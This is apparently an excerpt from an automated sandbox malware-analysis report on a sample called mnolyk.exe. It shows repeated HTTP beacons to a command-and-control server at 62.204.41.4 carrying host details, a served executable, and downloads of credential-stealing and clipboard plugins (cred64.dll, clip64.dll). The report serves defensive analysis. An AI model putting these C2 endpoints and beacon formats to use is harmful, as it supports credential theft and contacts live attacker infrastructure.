                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 08 Feb 2023 20:31:09 GMTContent-Type: application/octet-streamContent-Length: 91136Last-Modified: Fri, 03 Feb 2023 17:19:21 GMTConnection: keep-aliveETag: "63dd4219-16400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 07 18 8f 2c 43 79 e1 7f 43 79 e1 7f 43 79 e1 7f 18 11 e2 7e 49 79 e1 7f 18 11 e4 7e cb 79 e1 7f 18 11 e5 7e 51 79 e1 7f 96 14 e5 7e 4c 79 e1 7f 96 14 e2 7e 52 79 e1 7f 96 14 e4 7e 62 79 e1 7f 18 11 e0 7e 46 79 e1 7f 43 79 e0 7f 19 79 e1 7f d8 17 e8 7e 40 79 e1 7f d8 17 e1 7e 42 79 e1 7f d8 17 1e 7f 42 79 e1 7f d8 17 e3 7e 42 79 e1 7f 52 69 63 68 43 79 e1 7f 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 d4 38 dd 63 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 18 00 de 00 00 00 8c 00 00 00 00 00 00 00 3e 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 01 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 a0 4a 01 00 9c 00 00 00 3c 4b 01 00 3c 00 00 00 00 80 01 00 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 01 00 54 10 00 00 20 3f 01 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 3f 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 2c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 56 dd 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 ee 61 00 00 00 f0 00 00 00 62 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 14 00 00 00 60 01 00 00 0c 00 00 00 44 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 00 00 00 00 80 01 00 00 02 00 00 00 50 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 54 10 00 00 00 90 01 00 00 12 00 00 00 52 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Source: Joe Sandbox ViewASN Name: TNNET-ASTNNetOyMainnetworkFI TNNET-ASTNNetOyMainnetworkFI
                            Source: Joe Sandbox ViewIP Address: 62.204.41.4 62.204.41.4
                            Source: mnolyk.exe, 00000010.00000002.785793369.0000000001161000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/Plugins/clip64.dll
                            Source: mnolyk.exe, 00000010.00000002.785793369.000000000113A000.00000004.00000020.00020000.00000000.sdmp, mnolyk.exe, 00000010.00000002.785793369.00000000010FA000.00000004.00000020.00020000.00000000.sdmp, mnolyk.exe, 00000010.00000002.785793369.0000000001161000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/Plugins/cred64.dll
                            Source: mnolyk.exe, 00000010.00000002.785793369.000000000113A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/Plugins/cred64.dllG
                            Source: mnolyk.exe, 00000010.00000002.785793369.0000000001161000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.php
                            Source: mnolyk.exe, 00000010.00000002.785793369.0000000001161000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.php.
                            Source: mnolyk.exe, 00000010.00000002.785793369.0000000001161000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.php2
                            Source: mnolyk.exe, 00000010.00000002.785793369.0000000001161000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.php342a2
                            Source: mnolyk.exe, 00000010.00000002.785793369.000000000117F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpFo
                            Source: mnolyk.exe, 00000010.00000002.785793369.000000000117F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpIo
                            Source: mnolyk.exe, 00000010.00000002.785793369.0000000001161000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpL
                            Source: mnolyk.exe, 00000010.00000003.741852374.0000000001197000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpc
                            Source: mnolyk.exe, 00000010.00000002.785793369.000000000113A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpe
                            Source: mnolyk.exe, 00000010.00000002.785793369.000000000113A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpe5342a2
                            Source: mnolyk.exe, 00000010.00000002.785793369.000000000117F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpm0
                            Source: mnolyk.exe, 00000010.00000002.785793369.0000000001161000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.phprundll32.exe
                            Source: mnolyk.exe, 00000010.00000002.785793369.0000000001161000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.phprundll32.exel
                            Source: mnolyk.exe, 00000010.00000002.785793369.0000000001161000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpt
                            Source: mnolyk.exe, 00000010.00000002.785793369.0000000001161000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.phptch
                            Source: mnolyk.exe, 00000010.00000002.785793369.00000000010FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpyux
                            Source: mnolyk.exe, 00000010.00000002.785793369.000000000117F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Golol478Ns/index.php
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 15_2_011D7F00 CreateMutexW,GetLastError,SetCurrentDirectoryA,CreateFileA,InternetOpenA,InternetOpenUrlA,InternetReadFile,WriteFile,WriteFile,InternetReadFile,CloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,RemoveDirectoryA,15_2_011D7F00
                            Source: global trafficHTTP traffic detected: GET /Gol478Ns/Plugins/cred64.dll HTTP/1.1Host: 62.204.41.4
                            Source: global trafficHTTP traffic detected: GET /Gol478Ns/Plugins/clip64.dll HTTP/1.1Host: 62.204.41.4
